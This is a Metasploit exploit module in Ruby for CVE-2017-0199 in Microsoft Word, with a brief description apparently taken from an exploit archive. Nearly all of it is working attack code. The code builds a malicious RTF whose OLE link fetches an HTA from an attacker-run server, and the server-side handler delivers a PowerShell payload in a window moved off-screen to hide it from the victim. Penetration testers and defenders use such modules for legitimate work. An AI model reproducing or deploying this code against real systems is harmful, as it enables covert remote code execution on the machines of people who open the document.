This Metasploit module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This Metasploit module was created by reversing a public malware sample.
22d66842eeda59c2f386116bd2c8a720##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end